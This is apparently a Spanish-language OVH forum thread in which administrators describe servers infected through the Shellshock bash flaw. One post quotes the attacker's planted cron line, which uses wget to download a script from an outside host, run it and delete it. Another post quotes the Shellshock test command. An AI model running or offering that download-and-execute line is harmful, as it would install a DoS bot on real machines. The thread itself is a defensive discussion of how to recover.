OVH Community, your new community space.

Correo recibido e infección: Release 2: potencial fallo de seguridad en su servidor

isaaclg

01/11/2014, 23:03

Hola.

Me ha pasado lo mismo que a vosotros. Desde ovh como siempre se lavan las manos.....

En uno de los dos servidores no se me volvio a colar el troyano, pero en el otro si, cada vez que consigo editar el cron para quitar esa linea, a los pocos minutos vuelve a aparecer. Debe haber por ahi algun script corriendo que compruebe si esta funcionando y si no lo esta vuelve a ponerlo.

Alguna idea para saber que script puede ser? Tengo la version de la release 2 actualizada.

Saludos

PedroSG

23/10/2014, 19:10

Hola chriswa, justamente estaba leyendo ese hilo en el foro francés, me quedan unas cuantas páginas todavía...

La primera información que tuve del troyano la saque de aquí:
http://blog.cristianmartin.org/2014/...n-troyano.html

Y de ahí un enlace en el que explican la vulnerabilidad y como detectarla:
http://rm-rf.in/post/98621485262/she...-vulnerability

Básicamente es ejecutar esta sentencia:

Código:

env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

Si la salida muestra el texto "Bash is vulnerable!" es que no es una versión segura.

La actualización viene en la actualización 2.35 de la release 2, puedes comprobarla con el comando:
cat /etc/ovhrelease

Gracias por tu comentario, un saludo!

chriswa

23/10/2014, 18:51

Buenas tardes,

Tu servidor, como el mio fue hackeado.
Yo consegui arreglarlo gracias al foro francés de ovh y con el metodo descrito aqui :

http://forum.ovh.com/showthread.php?...he-cron/page22

El problema es bastante gordo y dicen que seguramente haya miles de servidores no actualizados afectados. Por lo que he entendido habrá que pensar en cambiar de servidor o por lo menos de release.

Por cierto, puedes decirme como haces la comprobación de la version de bash ? Quisiera verificarla también pero no se como hacer.

Espero haberte ayudado

PedroSG

23/10/2014, 18:01

Buenas tardes, recientemente he tenido problemas en los servidores que tengo contratados con OVH, son dos y ambos trabajando con el sistema operativo OVH release 2. Estaban lentos, el webmin dejaba de estar accesible aunque el servicio indicaba que estaba funcionando, y las tareas cron creadas por mi habían dejado de ejecutarse.

Ayer recibí un correo de ovh con el asunto "[IMPORTANTE] Release 2: potencial fallo de seguridad en su servidor" en el que indican que se debe realizar un update para aplicar un parche al sistema operativo.

Apliqué el parche, reinicié y pude acceder al webmin, al entrar a lista de tareas cron me encuentro que la vulnerabilidad fue explotada en el servidor y se había creado una nueva tarea con este comando:

Código:

@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh; >/dev/null 2>&1

Esto descarga un script y lo ejecuta para descargar otro script en perl, que parece ser un cliente irc de denegación de servicio (en este tema me pierdo...)

La cuestión es que eliminé la tarea en el crontab, y ejecuté la comprobación de la versión de bash para asegurarme de que era una versión segura, pero no estoy seguro de que el servidor esté realmente limpio, o si puede haberse quedado oculto en alguna parte el troyano indicado.

Además tampoco he conseguido con mis cron que antes funcionaban vuelvan a hacerlo, solamente se ejecutan los que venían de serie con la release 2.

Cualquier ayuda sobre el tema será bienvenida!